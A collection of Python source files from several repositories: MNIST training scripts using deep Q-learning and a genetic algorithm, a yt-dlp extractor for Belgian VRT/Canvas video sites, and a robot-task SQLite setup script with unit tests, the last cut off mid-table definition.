import random
import time
class MnEnviroment(object):
def __init__(self, x, y):
self.train_X = x
self.train_Y = y
self.current_index = self._sample_index()
self.action_space = len(set(y)) - 1
def reset(self):
obs, _ = self.step(-1)
return obs
'''
action: 0-9 categori, -1 : start and no reward
return: next_state(image), reward
'''
def step(self, action):
if action == -1:
_c_index = self.current_index
self.current_index = self._sample_index()
return self.train_X[_c_index], 0
r = self.reward(action)
self.current_index = self._sample_index()
return self.train_X[self.current_index], r
def reward(self, action):
c = self.train_Y[self.current_index]
# print(c)
return 1 if c == action else -1
def sample_actions(self):
return random.randint(0, self.action_space)
def _sample_index(self):
return random.randint(0, len(self.train_Y) - 1)
def createDQN(input_width, input_height, actions_num):
img_input = Input(shape=(input_width, input_height, 1), dtype='float32', name='image_inputs')
# conv1
conv1 = Conv2D(32, 3, padding='same', activation='relu', kernel_initializer='he_normal')(img_input)
conv2 = Conv2D(64, 3, strides=2, padding='same', activation='relu', kernel_initializer='he_normal')(conv1)
conv3 = Conv2D(64, 3, strides=2, padding='same', activation='relu', kernel_initializer='he_normal')(conv2)
conv4 = Conv2D(128, 3, strides=2, padding='same', activation='relu', kernel_initializer='he_normal')(conv3)
x = Flatten()(conv4)
x = Dense(128, activation='relu')(x)
outputs_q = Dense(actions_num, name='q_outputs')(x)
# one hot input
actions_input = Input((actions_num,), name='actions_input')
q_value = multiply([actions_input, outputs_q])
q_value = Lambda(lambda l: K.sum(l, axis=1, keepdims=True), name='q_value')(q_value)
model = Model(inputs=[img_input, actions_input], outputs=q_value)
model.compile(loss='mse', optimizer='adam')
return model
def copy_critic_to_actor():
critic_weights = critic_model.get_weights()
actor_wegiths = actor_model.get_weights()
for i in range(len(critic_weights)):
actor_wegiths[i] = critic_weights[i]
actor_model.set_weights(actor_wegiths)
def get_q_values(model_, state):
inputs_ = [state.reshape(1, *state.shape), dummy_actions]
qvalues = model_.predict(inputs_)
return qvalues[0]
def predict(model, states):
inputs_ = [states, np.ones(shape=(len(states), num_actions))]
qvalues = model.predict(inputs_)
return np.argmax(qvalues, axis=1)
def epsilon_calc(step, ep_min=0.01, ep_max=1, ep_decay=0.0001, esp_total=1000):
return max(ep_min, ep_max - (ep_max - ep_min) * step / esp_total)
def epsilon_greedy(env, state, step, ep_min=0.01, ep_decay=0.0001, ep_total=1000):
epsilon = epsilon_calc(step, ep_min, 1, ep_decay, ep_total)
if np.random.rand() < epsilon:
return env.sample_actions(), 0
qvalues = get_q_values(actor_q_model, state)
return np.argmax(qvalues), np.max(qvalues)
def pre_remember(pre_go=30):
state = env.reset()
for i in range(pre_go):
rd_action = env.sample_actions()
next_state, reward = env.step(rd_action)
remember(state, rd_action, 0, reward, next_state)
state = next_state
def remember(state, action, action_q, reward, next_state):
memory.append([state, action, action_q, reward, next_state])
def sample_ram(sample_num):
return np.array(random.sample(memory, sample_num))
def replay():
if len(memory) < replay_size:
return
# 从记忆中i.i.d采样
samples = sample_ram(replay_size)
# 展开所有样本的相关数据
# 这里next_states没用 因为和上一个state无关。
states, actions, old_q, rewards, next_states = zip(*samples)
states, actions, old_q, rewards = np.array(states), np.array(actions).reshape(-1, 1), \
np.array(old_q).reshape(-1, 1), np.array(rewards).reshape(-1, 1)
actions_one_hot = np_utils.to_categorical(actions, num_actions)
# print(states.shape,actions.shape,old_q.shape,rewards.shape,actions_one_hot.shape)
# 从actor获取下一个状态的q估计值 这里也没用 因为gamma=0 也就是不对bellman方程展开
# inputs_ = [next_states,np.ones((replay_size,num_actions))]
# qvalues = actor_q_model.predict(inputs_)
# q = np.max(qvalues,axis=1,keepdims=True)
q = 0
q_estimate = (1 - alpha) * old_q + alpha * (rewards.reshape(-1, 1) + gamma * q)
history = critic_model.fit([states, actions_one_hot], q_estimate, epochs=1, verbose=0)
return np.mean(history.history['loss'])
if __name__ == '__main__':
# parameters
memory = deque(maxlen=512)
replay_size = 64
epoches = 2000
pre_train_num = 256
gamma = 0. # every state is i.i.d
alpha = 0.5
forward = 512
epislon_total = 2018
# load mnist dataset
# X : 0-255, Y :0-9
f = np.load('./data/mnist.npz')
X_train, y_train = f['x_train'], f['y_train']
X_test, y_test = f['x_test'], f['y_test']
num_actions = len(set(y_test))
image_w, image_h = X_train.shape[1:]
print(y_test[0])
# nums*28*28*1
X_train = X_train.reshape(*X_train.shape, 1)
X_test = X_test.reshape(*X_test.shape, 1)
print(len(X_train))
print(len(X_test))
# normalization
X_train = X_train / 255.
X_test = X_test / 255.
dummy_actions = np.ones((1, num_actions))
# y_train_onehot = keras.utils.to_categorical(y_train, num_actions)
# y_test_onehot = keras.utils.to_categorical(y_test, num_actions)
# plt.imshow(X_train[0].reshape(28, 28), 'gray')
# plt.show()
# start code
env = MnEnviroment(X_train, y_train)
# init mode
actor_model = createDQN(image_w, image_h, num_actions) # 用于决策
critic_model = createDQN(image_w, image_h, num_actions) # 用于训练
actor_q_model = Model(inputs=actor_model.input, outputs=actor_model.get_layer('q_outputs').output)
memory.clear()
total_rewards = 0
reward_rec = []
pre_remember(pre_train_num)
every_copy_step = 128
pbar = tqdm(range(1, epoches + 1))
state = env.reset()
for epoch in pbar:
total_rewards = 0
epo_start = time.time()
for step in range(forward):
# 对每个状态使用epsilon_greedy选择
action, q = epsilon_greedy(env, state, epoch, ep_min=0.01, ep_total=epislon_total)
eps = epsilon_calc(epoch, esp_total=epislon_total)
# play
next_state, reward = env.step(action)
# 加入到经验记忆中
remember(state, action, q, reward, next_state)
# 从记忆中采样回放,保证iid。实际上这个任务中这一步不是必须的。
loss = replay()
total_rewards += reward
state = next_state
if step % every_copy_step == 0:
copy_critic_to_actor()
reward_rec.append(total_rewards)
pbar.set_description(
'R:{} L:{:.4f} T:{} P:{:.3f}'.format(total_rewards, loss, int(time.time() - epo_start), eps))
critic_model.save('./model_path/critic_2000.HDF5')
r5 = np.mean([reward_rec[i:i + 10] for i in range(0, len(reward_rec), 10)], axis=1)
plt.plot(range(len(r5)), r5, c='b')
plt.xlabel('iters')
plt.ylabel('mean score')
plt.show()
copy_critic_to_actor()
model_loaded = keras.models.load_model('critic_2000.HDF5')
pred = predict(actor_q_model, X_test)
accuracy_score(y_test, pred)
```
#### File: JHWen/mnist_tensorflow/mlp_ga.py
```python
import time
import threading
import math
import random
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
INPUT_DIMENSIONS = [28, 28, 1]
# Hyper params
BATCH_SIZE = 200
NUM_GENERATIONS = 100
MUTATION_POWER = 0.005
POP_SIZE = 500
NUM_SELECTED_IND = 10
# Display log messages after every LOG_FREQUENCY iterations during training
LOG_FREQUENCY = 1
# Some MLP networks - can be replaced with deeper MLPs or Covnets
def inference_1_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 1 layer
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 10, activation_fn=None, reuse=reuse, scope='layer1')
return te_net
def inference_2_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 2 layers
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 128, activation_fn=tf.nn.selu, reuse=reuse, scope='layer1')
te_net = slim.fully_connected(te_net, 10, activation_fn=None, reuse=reuse, scope='layer2')
return te_net
def reward(te_inference, tp_labels):
"""
Reward for the current inference, negative of the traditional loss
:te_inference: expression for logits
:tp_labels: placeholder for true labels
:return: reward expression
"""
return -tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tp_labels, logits=te_inference))
def accuracy(te_inference, tp_labels):
"""
Construct accuracy expression
:te_inference: expression for logits
:tp_labels: true label placeholder
:return: accuracy expression
"""
te_correct_prediction = tf.equal(tf.argmax(te_inference, 1), tf.argmax(tp_labels, 1))
return tf.reduce_mean(tf.cast(te_correct_prediction, tf.float32))
def placeholders():
"""
Creates placeholders for inputs and labels
"""
tp_input = tf.placeholder(tf.float32, shape=[None, INPUT_DIMENSIONS[0] * INPUT_DIMENSIONS[1]])
tp_label = tf.placeholder(tf.float32, shape=[None, 10])
return tp_input, tp_label
def iterate_minibatches(input_set, target_set, batch_size, shuffle=False):
"""
Generator to yield minibatches for a training set
:input_set: input feature set
:target_set: target labels for the features
:batch_size: batch size for minibatch
:shuffle: shuffle the data
"""
if shuffle:
indices = np.arange(len(input_set))
np.random.shuffle(indices)
for start_idx in range(0, len(input_set) - batch_size + 1, batch_size):
if shuffle:
excerpt = indices[start_idx:start_idx + batch_size]
else:
excerpt = slice(start_idx, start_idx + batch_size)
yield input_set[excerpt], target_set[excerpt]
def train(num_generations, mutation_power, pop_size, num_selected_ind, resume=False):
"""
Train the neural network using a simple genetic algorithm
:num_generations: number of generations in GA
:mutation_power: std dev of perturbations
:pop_size: number of members in each population
:num_selected_ind: number of selected individuals from the population
:resume: load a saved model and resume from there
"""
def normalize_weights(w):
"""
Normalize weights - a good initialization for GAs
"""
w *= 1.0 / np.sqrt(np.square(w).sum(axis=0, keepdims=True))
return w
def create_feed_dict(x, t, params):
"""
Utility for creating feed dictionary
"""
f_dict = {tp_input: x, tp_labels: t}
for te_l_p, param in zip(te_layer_params, params):
f_dict[te_l_p] = param
return f_dict
# load dataset
dataset = input_data.read_data_sets('MNIST_data', one_hot=True)
# for now just work on subset of original dataset
train_images = dataset.train.images[:2000]
train_labels = dataset.train.labels[:2000]
with tf.Graph().as_default():
# create the network and reward, accuracy expressions
tp_input, tp_labels = placeholders()
te_inference = inference_2_layer_mlp(tp_input)
te_reward = reward(te_inference, tp_labels)
te_accuracy = accuracy(te_inference, tp_labels)
# initialize all parameters
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
# logging
summary_writer = tf.summary.FileWriter('./summaries_ga', sess.graph)
saver = tf.train.Saver()
# create initial param vector
te_layer_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='mnist_ga')
params = [[] for _ in range(pop_size)]
fitness = np.zeros((pop_size,))
if resume:
params = np.load("./saved_models/mnist_ga_params.npy")
else:
for i in range(pop_size):
# initialize the individual
for te_p in te_layer_params:
# for weights do initialization with normal distribution
if "biases" not in te_p.name:
params[i].append(
normalize_weights(sess.run(tf.random_normal(te_p.shape, stddev=mutation_power))))
# for biases, initialize with zeros
else:
params[i].append(sess.run(te_p))
# evaluate it's fitness
for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
fitness[i] += sess.run(te_reward, feed_dict=create_feed_dict(batch[0], batch[1], params[i]))
# simple genetic algorithm
for g in range(num_generations):
# sort params by fitness
param_index_sorted = [x for (y, x) in
sorted(zip(fitness, range(pop_size)), key=lambda pair: pair[0], reverse=True)]
# initialize next gen params and fitness as 0
next_gen_params = [[] for _ in range(pop_size + 1)]
next_gen_fitness = np.zeros((pop_size + 1,))
# include elite of previous generation as 1st member of new population
next_gen_params[0] = params[param_index_sorted[0]]
next_gen_fitness[0] = fitness[param_index_sorted[0]]
# do logging
if g % LOG_FREQUENCY == 0:
print(fitness.shape)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="F-0", simple_value=fitness[param_index_sorted[0]]),
]), g)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="F-1", simple_value=fitness[param_index_sorted[1]]),
]), g)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="F-2", simple_value=fitness[param_index_sorted[2]]),
]), g)
# for each member of new pop, select a new member as the perturbed variant of top "num_select_ind"
# members of previous pop
for i in range(pop_size):
selected_index = param_index_sorted[random.randint(0, num_selected_ind - 1)]
next_gen_params[i + 1] = params[selected_index]
for next_gen_param_idx in range(len(next_gen_params[i + 1])):
next_gen_params[i + 1][next_gen_param_idx] = next_gen_params[i + 1][
next_gen_param_idx] + mutation_power * np.random.normal(
0, 1, next_gen_params[i + 1][next_gen_param_idx].shape)
for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
next_gen_fitness[i + 1] += sess.run(te_reward, feed_dict=create_feed_dict(batch[0], batch[1],
next_gen_params[i + 1]))
# set next iterations params and fitness
params = next_gen_params
fitness = next_gen_fitness
if __name__ == '__main__':
train(NUM_GENERATIONS, MUTATION_POWER, POP_SIZE, NUM_SELECTED_IND)
``` |
{
"source": "jhwgh1968/yt-dlp",
"score": 2
} |
#### File: yt_dlp/extractor/canvas.py
```python
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from .gigya import GigyaBaseIE
from ..compat import compat_HTTPError
from ..utils import (
ExtractorError,
clean_html,
extract_attributes,
float_or_none,
get_element_by_class,
int_or_none,
merge_dicts,
str_or_none,
strip_or_none,
url_or_none,
urlencode_postdata
)
class CanvasIE(InfoExtractor):
_VALID_URL = r'https?://mediazone\.vrt\.be/api/v1/(?P<site_id>canvas|een|ketnet|vrt(?:video|nieuws)|sporza|dako)/assets/(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'https://mediazone.vrt.be/api/v1/ketnet/assets/md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'md5': '37b2b7bb9b3dcaa05b67058dc3a714a9',
'info_dict': {
'id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'display_id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'ext': 'mp4',
'title': 'Nachtwacht: De Greystook',
'description': 'Nachtwacht: De Greystook',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 1468.02,
},
'expected_warnings': ['is not a supported codec'],
}, {
'url': 'https://mediazone.vrt.be/api/v1/canvas/assets/mz-ast-5e5f90b6-2d72-4c40-82c2-e134f884e93e',
'only_matching': True,
}]
_GEO_BYPASS = False
_HLS_ENTRY_PROTOCOLS_MAP = {
'HLS': 'm3u8_native',
'HLS_AES': 'm3u8',
}
_REST_API_BASE = 'https://media-services-public.vrt.be/vualto-video-aggregator-web/rest/external/v1'
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
site_id, video_id = mobj.group('site_id'), mobj.group('id')
data = None
if site_id != 'vrtvideo':
# Old API endpoint, serves more formats but may fail for some videos
data = self._download_json(
'https://mediazone.vrt.be/api/v1/%s/assets/%s'
% (site_id, video_id), video_id, 'Downloading asset JSON',
'Unable to download asset JSON', fatal=False)
# New API endpoint
if not data:
headers = self.geo_verification_headers()
headers.update({'Content-Type': 'application/json'})
token = self._download_json(
'%s/tokens' % self._REST_API_BASE, video_id,
'Downloading token', data=b'', headers=headers)['vrtPlayerToken']
data = self._download_json(
'%s/videos/%s' % (self._REST_API_BASE, video_id),
video_id, 'Downloading video JSON', query={
'vrtPlayerToken': token,
'client': '%s@PROD' % site_id,
}, expected_status=400)
if not data.get('title'):
code = data.get('code')
if code == 'AUTHENTICATION_REQUIRED':
self.raise_login_required()
elif code == 'INVALID_LOCATION':
self.raise_geo_restricted(countries=['BE'])
raise ExtractorError(data.get('message') or code, expected=True)
title = data['title']
description = data.get('description')
formats = []
subtitles = {}
for target in data['targetUrls']:
format_url, format_type = url_or_none(target.get('url')), str_or_none(target.get('type'))
if not format_url or not format_type:
continue
format_type = format_type.upper()
if format_type in self._HLS_ENTRY_PROTOCOLS_MAP:
fmts, subs = self._extract_m3u8_formats_and_subtitles(
format_url, video_id, 'mp4', self._HLS_ENTRY_PROTOCOLS_MAP[format_type],
m3u8_id=format_type, fatal=False)
formats.extend(fmts)
subtitles = self._merge_subtitles(subtitles, subs)
elif format_type == 'HDS':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_type, fatal=False))
elif format_type == 'MPEG_DASH':
fmts, subs = self._extract_mpd_formats_and_subtitles(
format_url, video_id, mpd_id=format_type, fatal=False)
formats.extend(fmts)
subtitles = self._merge_subtitles(subtitles, subs)
elif format_type == 'HSS':
fmts, subs = self._extract_ism_formats_and_subtitles(
format_url, video_id, ism_id='mss', fatal=False)
formats.extend(fmts)
subtitles = self._merge_subtitles(subtitles, subs)
else:
formats.append({
'format_id': format_type,
'url': format_url,
})
self._sort_formats(formats)
subtitle_urls = data.get('subtitleUrls')
if isinstance(subtitle_urls, list):
for subtitle in subtitle_urls:
subtitle_url = subtitle.get('url')
if subtitle_url and subtitle.get('type') == 'CLOSED':
subtitles.setdefault('nl', []).append({'url': subtitle_url})
return {
'id': video_id,
'display_id': video_id,
'title': title,
'description': description,
'formats': formats,
'duration': float_or_none(data.get('duration'), 1000),
'thumbnail': data.get('posterImageUrl'),
'subtitles': subtitles,
}
class CanvasEenIE(InfoExtractor):
IE_DESC = 'canvas.be and een.be'
_VALID_URL = r'https?://(?:www\.)?(?P<site_id>canvas|een)\.be/(?:[^/]+/)*(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'http://www.canvas.be/video/de-afspraak/najaar-2015/de-afspraak-veilt-voor-de-warmste-week',
'md5': 'ed66976748d12350b118455979cca293',
'info_dict': {
'id': 'mz-ast-5e5f90b6-2d72-4c40-82c2-e134f884e93e',
'display_id': 'de-afspraak-veilt-voor-de-warmste-week',
'ext': 'flv',
'title': 'De afspraak veilt voor de Warmste Week',
'description': 'md5:24cb860c320dc2be7358e0e5aa317ba6',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 49.02,
},
'expected_warnings': ['is not a supported codec'],
}, {
# with subtitles
'url': 'http://www.canvas.be/video/panorama/2016/pieter-0167',
'info_dict': {
'id': 'mz-ast-5240ff21-2d30-4101-bba6-92b5ec67c625',
'display_id': 'pieter-0167',
'ext': 'mp4',
'title': 'Pieter 0167',
'description': 'md5:943cd30f48a5d29ba02c3a104dc4ec4e',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 2553.08,
'subtitles': {
'nl': [{
'ext': 'vtt',
}],
},
},
'params': {
'skip_download': True,
},
'skip': 'Pagina niet gevonden',
}, {
'url': 'https://www.een.be/thuis/emma-pakt-thilly-aan',
'info_dict': {
'id': 'md-ast-3a24ced2-64d7-44fb-b4ed-ed1aafbf90b8',
'display_id': 'emma-pakt-thilly-aan',
'ext': 'mp4',
'title': 'Emma pakt Thilly aan',
'description': 'md5:c5c9b572388a99b2690030afa3f3bad7',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 118.24,
},
'params': {
'skip_download': True,
},
'expected_warnings': ['is not a supported codec'],
}, {
'url': 'https://www.canvas.be/check-point/najaar-2016/de-politie-uw-vriend',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
site_id, display_id = mobj.group('site_id'), mobj.group('id')
webpage = self._download_webpage(url, display_id)
title = strip_or_none(self._search_regex(
r'<h1[^>]+class="video__body__header__title"[^>]*>(.+?)</h1>',
webpage, 'title', default=None) or self._og_search_title(
webpage, default=None))
video_id = self._html_search_regex(
r'data-video=(["\'])(?P<id>(?:(?!\1).)+)\1', webpage, 'video id',
group='id')
return {
'_type': 'url_transparent',
'url': 'https://mediazone.vrt.be/api/v1/%s/assets/%s' % (site_id, video_id),
'ie_key': CanvasIE.ie_key(),
'id': video_id,
'display_id': display_id,
'title': title,
'description': self._og_search_description(webpage),
}
class VrtNUIE(GigyaBaseIE):
IE_DESC = 'VrtNU.be'
_VALID_URL = r'https?://(?:www\.)?vrt\.be/vrtnu/a-z/(?:[^/]+/){2}(?P<id>[^/?#&]+)'
_TESTS = [{
# Available via old API endpoint
'url': 'https://www.vrt.be/vrtnu/a-z/postbus-x/1989/postbus-x-s1989a1/',
'info_dict': {
'id': 'pbs-pub-e8713dac-899e-41de-9313-81269f4c04ac$vid-90c932b1-e21d-4fb8-99b1-db7b49cf74de',
'ext': 'mp4',
'title': 'Postbus X - Aflevering 1 (Seizoen 1989)',
'description': 'md5:b704f669eb9262da4c55b33d7c6ed4b7',
'duration': 1457.04,
'thumbnail': r're:^https?://.*\.jpg$',
'series': 'Postbus X',
'season': 'Seizoen 1989',
'season_number': 1989,
'episode': 'De zwarte weduwe',
'episode_number': 1,
'timestamp': 1595822400,
'upload_date': '20200727',
},
'skip': 'This video is only available for registered users',
'params': {
'username': '<snip>',
'password': '<<PASSWORD>>',
},
'expected_warnings': ['is not a supported codec'],
}, {
# Only available via new API endpoint
'url': 'https://www.vrt.be/vrtnu/a-z/kamp-waes/1/kamp-waes-s1a5/',
'info_dict': {
'id': 'pbs-pub-0763b56c-64fb-4d38-b95b-af60bf433c71$vid-ad36a73c-4735-4f1f-b2c0-a38e6e6aa7e1',
'ext': 'mp4',
'title': 'Aflevering 5',
'description': 'Wie valt door de mand tijdens een missie?',
'duration': 2967.06,
'season': 'Season 1',
'season_number': 1,
'episode_number': 5,
},
'skip': 'This video is only available for registered users',
'params': {
'username': '<snip>',
'password': '<<PASSWORD>>',
},
'expected_warnings': ['Unable to download asset JSON', 'is not a supported codec', 'Unknown MIME type'],
}]
_NETRC_MACHINE = 'vrtnu'
_APIKEY = '<KEY>'
_CONTEXT_ID = 'R3595707040'
def _real_initialize(self):
self._login()
def _login(self):
username, password = self._get_login_info()
if username is None:
return
auth_info = self._download_json(
'https://accounts.vrt.be/accounts.login', None,
note='Login data', errnote='Could not get Login data',
headers={}, data=urlencode_postdata({
'loginID': username,
'password': password,
'sessionExpiration': '-2',
'APIKey': self._APIKEY,
'targetEnv': 'jssdk',
}))
# Sometimes authentication fails for no good reason, retry
login_attempt = 1
while login_attempt <= 3:
try:
self._request_webpage('https://token.vrt.be/vrtnuinitlogin',
None, note='Requesting XSRF Token', errnote='Could not get XSRF Token',
query={'provider': 'site', 'destination': 'https://www.vrt.be/vrtnu/'})
post_data = {
'UID': auth_info['UID'],
'UIDSignature': auth_info['UIDSignature'],
'signatureTimestamp': auth_info['signatureTimestamp'],
'client_id': 'vrtnu-site',
'_csrf': self._get_cookies('https://login.vrt.be').get('OIDCXSRF').value,
}
self._request_webpage(
'https://login.vrt.be/perform_login',
None, note='Requesting a token', errnote='Could not get a token',
headers={}, data=urlencode_postdata(post_data))
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 401:
login_attempt += 1
self.report_warning('Authentication failed')
self._sleep(1, None, msg_template='Waiting for %(timeout)s seconds before trying again')
else:
raise e
else:
break
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
attrs = extract_attributes(self._search_regex(
r'(<nui-media[^>]+>)', webpage, 'media element'))
video_id = attrs['videoid']
publication_id = attrs.get('publicationid')
if publication_id:
video_id = publication_id + '$' + video_id
page = (self._parse_json(self._search_regex(
r'digitalData\s*=\s*({.+?});', webpage, 'digial data',
default='{}'), video_id, fatal=False) or {}).get('page') or {}
info = self._search_json_ld(webpage, display_id, default={})
return merge_dicts(info, {
'_type': 'url_transparent',
'url': 'https://mediazone.vrt.be/api/v1/vrtvideo/assets/%s' % video_id,
'ie_key': CanvasIE.ie_key(),
'id': video_id,
'display_id': display_id,
'season_number': int_or_none(page.get('episode_season')),
})
class DagelijkseKostIE(InfoExtractor):
IE_DESC = 'dagelijksekost.een.be'
_VALID_URL = r'https?://dagelijksekost\.een\.be/gerechten/(?P<id>[^/?#&]+)'
_TEST = {
'url': 'https://dagelijksekost.een.be/gerechten/hachis-parmentier-met-witloof',
'md5': '30bfffc323009a3e5f689bef6efa2365',
'info_dict': {
'id': 'md-ast-27a4d1ff-7d7b-425e-b84f-a4d227f592fa',
'display_id': 'hachis-parmentier-met-witloof',
'ext': 'mp4',
'title': 'Hachis parmentier met witloof',
'description': 'md5:9960478392d87f63567b5b117688cdc5',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 283.02,
},
'expected_warnings': ['is not a supported codec'],
}
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
title = strip_or_none(get_element_by_class(
'dish-metadata__title', webpage
) or self._html_search_meta(
'twitter:title', webpage))
description = clean_html(get_element_by_class(
'dish-description', webpage)
) or self._html_search_meta(
('description', 'twitter:description', 'og:description'),
webpage)
video_id = self._html_search_regex(
r'data-url=(["\'])(?P<id>(?:(?!\1).)+)\1', webpage, 'video id',
group='id')
return {
'_type': 'url_transparent',
'url': 'https://mediazone.vrt.be/api/v1/dako/assets/%s' % video_id,
'ie_key': CanvasIE.ie_key(),
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
}
``` |
{
"source": "jhwinter/bot-o-mat",
"score": 3
} |
#### File: commands/test/test_robot_type.py
```python
import contextlib
import pathlib
import unittest
import bot_o_mat.utils.db_connect
import bot_o_mat.commands.robot_type
data_dir: pathlib.Path = pathlib.Path(__file__).parent.parent.parent.joinpath(
"data"
).resolve()
connection = bot_o_mat.utils.db_connect.open_db(path=data_dir)
class TestRobotType(unittest.TestCase):
"""Class for unit testing robot_type module
:param unittest: [description]
:type unittest: [type]
"""
def test_get_robot_types(self):
"""[summary]
"""
with contextlib.closing(connection.cursor()) as cursor:
result = bot_o_mat.commands.robot_type.get_robot_types(
cursor=cursor
)
self.assertIsInstance(result, list)
[
self.assertIsInstance(element, dict)
for element in result
]
self.assertGreaterEqual(len(result), 6)
def test_robot_type_exists(
self,
robot_type: str = "Unipedal",
expected_value: bool = True
):
"""[summary]
"""
with contextlib.closing(connection.cursor()) as cursor:
result = bot_o_mat.commands.robot_type.robot_type_exists(
cursor=cursor,
type=robot_type
)
self.assertEqual(result, expected_value)
def test_robot_type_exists_fails(self):
"""[summary]
"""
self.test_robot_type_exists(robot_type="asdfa", expected_value=False)
def test_all_robot_types_succeed(self):
"""[summary]
"""
with contextlib.closing(connection.cursor()) as cursor:
robot_types: list = bot_o_mat.commands.robot_type.get_robot_types(
cursor=cursor
)
[
self.test_robot_type_exists(
robot_type=robot_type.get("id"),
expected_value=True
)
for robot_type in robot_types
]
if __name__ == "__main__":
unittest.main()
bot_o_mat.utils.db_connect.close_db(connection=connection)
```
#### File: bot-o-mat/scripts/setup_db.py
```python
import pathlib
import sqlite3
import sys
def initialize_robot_type_table(cursor: sqlite3.Cursor) -> bool:
"""Creates and populates the robot_type table with default values
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
def create() -> bool:
"""Create robot_type table
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE robot_type(
id TEXT PRIMARY KEY NOT NULL,
name TEXT UNIQUE NOT NULL
);
'''
)
cursor.connection.commit()
return True
def populate() -> bool:
"""Populate robot_type table
:return: [description]
:rtype: bool
"""
robot_type_sequence: list = [
("UNIPEDAL", "Unipedal"),
("BIPEDAL", "Bipedal"),
("QUADRUPEDAL", "Quadrupedal"),
("ARACHNID", "Arachnid"),
("RADIAL", "Radial"),
("AERONAUTICAL", "Aeronautical")
]
cursor.executemany(
"INSERT INTO robot_type(id, name) VALUES (?, ?)",
robot_type_sequence
)
cursor.connection.commit()
return True
if create() and populate():
return True
return False
def initialize_task_table(cursor: sqlite3.Cursor) -> bool:
"""Creates and populates the task table with default values
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
def create() -> bool:
"""Create task table
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE task(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
description TEXT UNIQUE NOT NULL,
eta INT NOT NULL,
robot_type TEXT NOT NULL DEFAULT ""
);
'''
)
cursor.connection.commit()
return True
def populate() -> bool:
"""Populate task table
:return: [description]
:rtype: bool
"""
tasks: list = [
{
"description": "do the dishes",
"eta": 1000
},
{
"description": "sweep the house",
"eta": 3000
},
{
"description": "do the laundry",
"eta": 10000
},
{
"description": "take out the recycling",
"eta": 4000
},
{
"description": "make a sammich",
"eta": 7000
},
{
"description": "mow the lawn",
"eta": 20000
},
{
"description": "rake the leaves",
"eta": 18000
},
{
"description": "give the dog a bath",
"eta": 14500
},
{
"description": "bake some cookies",
"eta": 8000
},
{
"description": "wash the car",
"eta": 20000
}
]
task_sequence: list = [
(task.get("description"), task.get("eta"))
for task in tasks
]
cursor.executemany(
"INSERT INTO task(description, eta) VALUES (?, ?)",
task_sequence
)
cursor.connection.commit()
return True
def populate_type_specific_tasks() -> bool:
"""Populate task table with type-specific tasks
:return: [description]
:rtype: bool
"""
tasks: list = [
{
"description": "hop on one leg",
"eta": 3000,
"robot_type": "UNIPEDAL"
},
{
"description": "do jumping jacks",
"eta": 10000,
"robot_type": "BIPEDAL"
},
{
"description": "outrun a dog",
"eta": 5000,
"robot_type": "QUADRUPEDAL"
},
{
"description": "clean the ceiling",
"eta": 20000,
"robot_type": "ARACHNID"
},
{
"description": "roll down the stairs",
"eta": 7000,
"robot_type": "RADIAL"
},
{
"description": "collect water from the clouds",
"eta": 20000,
"robot_type": "AERONAUTICAL"
}
]
task_sequence: list = [
(task.get("description"), task.get("eta"), task.get("robot_type"))
for task in tasks
]
cursor.executemany(
"INSERT INTO task(description, eta, robot_type) VALUES (?, ?, ?)",
task_sequence
)
cursor.connection.commit()
return True
if create() and populate() and populate_type_specific_tasks():
return True
return False
def create_robot_table(cursor: sqlite3.Cursor) -> bool:
"""Create robot table
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE robot(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
name TEXT UNIQUE NOT NULL,
robot_type_id TEXT NOT NULL,
FOREIGN KEY(robot_type_id)
REFERENCES robot_type(id)
ON UPDATE CASCADE
ON DELETE CASCADE
);
'''
)
cursor.connection.commit()
return True
def create_leaderboard_table(cursor: sqlite3.Cursor) -> bool:
"""Create leaderboard table
:param cursor: [description]
:type cursor: sqlite3.Cursor
:return: [description]
:rtype: bool
"""
cursor.execute(
'''
CREATE TABLE leaderboard(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
robot_id INT NOT NULL,
